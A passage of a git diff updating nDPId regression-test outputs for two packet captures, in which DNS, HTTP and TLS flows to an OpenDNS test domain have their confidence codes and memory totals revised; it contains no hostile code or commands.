{"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":8,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1593066612951} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 443 chars ~~ json string max len.......: 777 chars diff --git a/test/results/malware.pcap.out b/test/results/malware.pcap.out index 50af853ad..24208dae9 100644 --- a/test/results/malware.pcap.out +++ b/test/results/malware.pcap.out @@ -2,32 +2,32 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569571466977} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571466977,"flow_last_seen":1569571466977,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571466977,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569571466977,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1569571466977,"pkt":"CGoKOl4eMFLLbJwbCABFAABcg9cAAEARLQnAqAcHAQEBAaWCADUASMoKC6QBIAABAAAAAAABA3d3dw9pbnRlcm5ldGJhZGd1eXMDY29tAAABAAEAACkQAAAAAAAADAAKAAjrBFAObfGpig=="} -00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571466977,"flow_last_seen":1569571466977,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571466977,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.internetbadguys.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571466977,"flow_last_seen":1569571466977,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571466977,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.internetbadguys.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569571467001,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1569571467001,"pkt":"MFLLbJwbCGoKOl4eCABFAABgLqZAADcRSzYBAQEBwKgHBwA1pYIATEdsC6SBgAABAAEAAAABA3d3dw9pbnRlcm5ldGJhZGd1eXMDY29tAAABAAHADAABAAEAAAABAARD11zSAAApBawAAAAAAAA="} -00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1569571467001,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.internetbadguys.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"67.215.92.210"}} +00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1569571467001,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.internetbadguys.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"67.215.92.210"}} 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569571470672,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569571470672,"pkt":"CGoKOl4eMFLLbJwbCABFAABU4M1AAEABCcTAqAcHkIv33AgApMYAAQABjsKNXQAAAABuRAoAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} -00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900} +00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569571476362,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569571476362,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569571476362,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0sPtAAEAGObHAqAcHkIv33IOqAFCfbfb4AAAAAIAC+vBQPgAAAgQFtAEBBAIBAwMH"} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":196,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":3,"total-active-flows":3,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1569579408876} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7580000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569579408876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1569579408876,"pkt":"CGoKOl4eMFLLbJwbCABFAAFxQQlAAEAGkCXAqAcHQ9dc0r0KAFDJvdSn63fGVVAYAfZpvAAAR0VUIC8gSFRUUC8xLjENCkhvc3Q6IHd3dy5pbnRlcm5ldGJhZGd1eXMuY29tDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo2OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzY4LjANCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC41DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkROVDogMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KDQo="} -00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7580000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OpenDNS","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.internetbadguys.com","url":"www.internetbadguys.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; rv:68.0) Gecko\/20100101 Firefox\/68.0"}} +00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7580000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OpenDNS","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.internetbadguys.com","url":"www.internetbadguys.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; rv:68.0) Gecko\/20100101 Firefox\/68.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569579409087,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569579409087,"pkt":"MFLLbJwbCGoKOl4eCABFAABUIjBAADgGuBtD11zSwKgHBwBQvQrrd8wJyb3V8FAYAO11CAAALDXKuXRPxt9F45TTtQ17T177PqBz\/8Tm+6YgbZe0R+XFq38BUlr3UR8MAAA="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579416636,"flow_last_seen":1569579416636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579416636,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569579416636,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416636,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0xe5AAEAGDH3AqAcHQ9dc0omkAbvdSlrrAAAAAIAC+vBofwAAAgQFtAEBBAIBAwMH"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569579416828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416828,"pkt":"MFLLbJwbCGoKOl4eCABFAAA0AABAADgG2mtD11zSwKgHBwG7iaQdaco+3Upa7IASchDpWQAAAgQFtAEBBAIBAwMH"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569579416828,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569579416828,"pkt":"CGoKOl4eMFLLbJwbCABFAAAoxe9AAEAGDIjAqAcHQ9dc0omkAbvdSlrsHWnKP1AQAfZocwAA"} -00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569579416636,"flow_last_seen":1569579416830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569579416830,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569579416636,"flow_last_seen":1569579417029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1569579417029,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02462{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569579416636,"flow_last_seen":1569579417030,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4897,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1569579417030,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","server_names":"api.opendns.com,branded-login.opendns.com,cachecheck.opendns.com,community.opendns.com,dashboard2.opendns.com,dashboard.opendns.com,dashboard-ipv4.opendns.com,msp-login.opendns.com,api-ipv4.opendns.com,api-ipv6.opendns.com,authz.api.opendns.com,domain.opendns.com,help.vpn.opendns.com,ideabank.opendns.com,login.opendns.com,netgear.opendns.com,reseller-login.opendns.com,images.opendns.com,images-using.opendns.com,store.opendns.com,signup.opendns.com,twilio.opendns.com,updates.opendns.com,shared.opendns.com,tools.opendns.com,cache.opendns.com,api.umbrella.com,branded-login.umbrella.com,cachecheck.umbrella.com,community.umbrella.com,dashboard2.umbrella.com,dashboard.umbrella.com,dashboard-ipv4.umbrella.com,msp-login.umbrella.com,api-ipv4.umbrella.com,api-ipv6.umbrella.com,authz.api.umbrella.com,domain.umbrella.com,help.vpn.umbrella.com,ideabank.umbrella.com,login.umbrella.com,netgear.umbrella.com,reseller-login.umbrella.com,images.umbrella.com,images-using.umbrella.com,store.umbrella.com,signup.umbrella.com,twilio.umbrella.com,updates.umbrella.com,shared.umbrella.com,tools.umbrella.com,cache.umbrella.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=OpenDNS, Inc., CN=api.opendns.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"21:B4:CF:84:13:3A:21:A4:B0:02:63:76:39:84:EA:ED:27:EE:51:7C"}} +00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569579416636,"flow_last_seen":1569579416830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569579416830,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569579416636,"flow_last_seen":1569579417029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1569579417029,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02462{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569579416636,"flow_last_seen":1569579417030,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4897,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1569579417030,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","server_names":"api.opendns.com,branded-login.opendns.com,cachecheck.opendns.com,community.opendns.com,dashboard2.opendns.com,dashboard.opendns.com,dashboard-ipv4.opendns.com,msp-login.opendns.com,api-ipv4.opendns.com,api-ipv6.opendns.com,authz.api.opendns.com,domain.opendns.com,help.vpn.opendns.com,ideabank.opendns.com,login.opendns.com,netgear.opendns.com,reseller-login.opendns.com,images.opendns.com,images-using.opendns.com,store.opendns.com,signup.opendns.com,twilio.opendns.com,updates.opendns.com,shared.opendns.com,tools.opendns.com,cache.opendns.com,api.umbrella.com,branded-login.umbrella.com,cachecheck.umbrella.com,community.umbrella.com,dashboard2.umbrella.com,dashboard.umbrella.com,dashboard-ipv4.umbrella.com,msp-login.umbrella.com,api-ipv4.umbrella.com,api-ipv6.umbrella.com,authz.api.umbrella.com,domain.umbrella.com,help.vpn.umbrella.com,ideabank.umbrella.com,login.umbrella.com,netgear.umbrella.com,reseller-login.umbrella.com,images.umbrella.com,images-using.umbrella.com,store.umbrella.com,signup.umbrella.com,twilio.umbrella.com,updates.umbrella.com,shared.umbrella.com,tools.umbrella.com,cache.umbrella.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=OpenDNS, Inc., CN=api.opendns.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"21:B4:CF:84:13:3A:21:A4:B0:02:63:76:39:84:EA:ED:27:EE:51:7C"}} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 